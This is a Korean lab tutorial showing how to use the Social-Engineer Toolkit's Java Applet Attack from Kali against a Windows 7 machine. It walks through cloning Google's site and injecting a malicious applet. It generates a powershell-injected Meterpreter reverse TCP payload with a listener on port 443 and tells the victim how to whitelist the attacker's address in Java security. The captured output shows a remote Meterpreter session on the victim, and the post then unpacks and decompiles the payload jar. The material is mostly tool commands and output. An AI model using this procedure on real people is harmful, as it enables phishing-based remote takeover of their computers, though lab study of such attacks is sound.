setoolkit을 이용한 Java Applet Attack

- 시용 시스템 

KaliLinux

Windows 7

- 실습

(kali)

# setoolkit

Select from the menu:    1) Social-Engineering Attacks    2) Penetration Testing (Fast-Track)    3) Third Party Modules    4) Update the Social-Engineer Toolkit    5) Update SET configuration    6) Help, Credits, and About   99) Exit the Social-Engineer Toolkit set>  1 Select from the menu:    1) Spear-Phishing Attack Vectors    2) Website Attack Vectors    3) Infectious Media Generator    4) Create a Payload and Listener    5) Mass Mailer Attack    6) Arduino-Based Attack Vector    7) Wireless Access Point Attack Vector    8) QRCode Generator Attack Vector    9) Powershell Attack Vectors   10) SMS Spoofing Attack Vector   11) Third Party Modules   99) Return back to the main menu. set> 2   1) Java Applet Attack Method    2) Metasploit Browser Exploit Method    3) Credential Harvester Attack Method    4) Tabnabbing Attack Method    5) Web Jacking Attack Method    6) Multi-Attack Web Method    7) Full Screen Attack Method    8) HTA Attack Method   99) Return to Main Menu t:webattack>1        1) Web Templates    2) Site Cloner    3) Custom Import   99) Return to Webattack Menu set:webattack>1 [-] NAT/Port Forwarding can be used in the cases where your SET machine is [-] not externally exposed and may be a different IP address than your reverse listener. set> Are you using NAT/Port Forwarding [yes|no]: no set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.17.50]: 192.168.27.50 [-------------------------------------------] Java Applet Configuration Options Below [-------------------------------------------] Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate. Select which option you want: 1. Make my own self-signed certificate applet. 2. Use the applet built into SET. 3. I have my own code signing certificate or applet. Enter the number you want to use [1-3]: 2 [*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(   1. Java Required   2. Google   3. Facebook   4. Twitter   5. Yahoo set:webattack> Select a template:2 [*] Cloning the website: http://www.google.com [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: gwCRFVtkWe [*] Malicious java applet website prepped for deployment What payload do you want to generate:   Name:                                       Description:    1) Meterpreter Memory Injection (DEFAULT)  This will drop a meterpreter payload through powershell injection    2) Meterpreter Multi-Memory Injection      This will drop multiple Metasploit payloads via powershell injection    3) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET    4) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support    5) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP    6) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec    7) Import your own executable              Specify a path for your own executable    8) Import your own commands.txt            Specify payloads to be sent via command line set:payloads> 1 set:payloads> PORT of the listener [443]: <enter> Select the payload you want to deliver via shellcode injection    1) Windows Meterpreter Reverse TCP    2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager    3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager    4) Windows Meterpreter (ALL PORTS) Reverse TCP set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1 [*] Prepping pyInjector for delivery.. [*] Prepping website for pyInjector shellcode injection.. [*] Base64 encoding shellcode and prepping for delivery.. [*] Multi/Pyinjection was specified. Overriding config options. [*] Generating x86-based powershell injection code... [*] Finished generating powershell injection bypass. [*] Encoded to bypass execution restriction policy... *************************************************** Web Server Launched. Welcome to the SET Web Attack. *************************************************** [--] Tested on Windows, Linux, and OSX [--] [*] Moving payload into cloned website. [*] The site has been moved. SET Web Server is now listening.. [-] Launching MSF Listener... [-] This may take a few to load MSF...        =[ metasploit v4.14.10-dev                         ] + -- --=[ 1639 exploits - 944 auxiliary - 289 post        ] + -- --=[ 472 payloads - 40 encoders - 9 nops             ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /root/.set//meta_config for ERB directives. resource (/root/.set//meta_config)> use exploit/multi/handler resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set//meta_config)> set LHOST 192.168.27.50 LHOST => 192.168.27.50 resource (/root/.set//meta_config)> set LPORT 443 LPORT => 443 resource (/root/.set//meta_config)> set EnableStageEncoding false EnableStageEncoding => false resource (/root/.set//meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set//meta_config)> exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.27.50:443  [*] Starting the payload handler... msf exploit(handler) >

> 설정을 하고 나면 자동으로 msfconsole이 실행됩니다. 

(win7)

http://java.com/ko 에서 다운을 받습니다. 

시작 > 모든 프로그램 > Java > Java 구성 > "보안" > [ V ] 높음

사이트 목록 편집 > 추가 > "http://192.168.27.50" "https://192.168.27.50"

익스플로어를 사용합니다. 

도구 > 인터넷 옵션

설정이 끝나면

http://192.168.27.50 으로 접속합니다. 

(kali)

[*] Sending stage (957487 bytes) to 192.168.27.202 [*] Meterpreter session 1 opened (192.168.27.50:443 -> 192.168.27.202:50056) at 2017-11-12 15:48:23 +0900 msf exploit(handler) > sessions Active sessions ===============   Id  Type                     Information                                     Connection   --  ----                     -----------                                     ----------   1   meterpreter x86/windows  adminstrator-PC\adminstrator @ ADMINSTRATOR-PC  192.168.27.50:443 -> 192.168.27.202:50056 (192.168.27.202) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer        : ADMINSTRATOR-PC OS              : Windows 7 (Build 7601, Service Pack 1). Architecture    : x64 System Language : ko_KR Domain          : WORKGROUP Logged On Users : 2 Meterpreter     : x86/windows meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.27.202 - Meterpreter session 1 closed.  Reason: User exit

# cd /root/.set

# ls

attack_vector   metasploit.payload         msf.exe                    site.template  x86.powershell jxacLZcCuN.jar  meterpreter.alpha          payload_options.shellcode  version.lock meta_config     meterpreter.alpha_decoded  set.options                web_clone

# file jxacLZcCuN.jar

jxacLZcCuN.jar: Zip archive data, at least v2.0 to extract

[참고] jar 명령어

# jar cvf

# jar tvf

# jar xvf

# jar tvf jxacLZcCuN.jar

244 Mon Jul 10 18:34:12 KST 2017 META-INF/MANIFEST.MF    313 Mon Jul 10 18:34:12 KST 2017 META-INF/DUMRFQDR.SF   1110 Mon Jul 10 18:34:12 KST 2017 META-INF/DUMRFQDR.DSA   5020 Mon Jul 10 18:31:52 KST 2017 Java.class

# jar xvf jxacLZcCuN.jar

# ls

Java.class     jxacLZcCuN.jar      meterpreter.alpha          payload_options.shellcode  version.lock META-INF       meta_config         meterpreter.alpha_decoded  set.options                web_clone attack_vector  metasploit.payload  msf.exe                    site.template              x86.powershell

# jad Java.class    /* compile 된 파일이라 바로 읽어볼 수 없기 때문에 decompile 과정을 거쳐야한다. */

Parsing Java.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)  Generating Java.jad Couldn't fully decompile method init Couldn't resolve all exception handlers in method init

# ls

Java.class  attack_vector   metasploit.payload         msf.exe                    site.template  x86.powershell Java.jad    jxacLZcCuN.jar  meterpreter.alpha          payload_options.shellcode  version.lock META-INF    meta_config     meterpreter.alpha_decoded  set.options                web_clone

# vi Java.jad

// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.geocities.com/kpdus/jad.html // Decompiler options: packimports(3)  import java.applet.Applet; import java.applet.AppletContext; import java.io.*; import java.net.URL; import java.net.URLConnection; import java.util.Random; import sun.misc.BASE64Decoder; public class Java extends Applet {     public Java()     {     }     public void init()     {         Object obj;         Object obj1;         String s1;         String s2;         Object obj2;         String s8; ..... 중략 ...

> java 소스를 확인 해 볼 수 있다.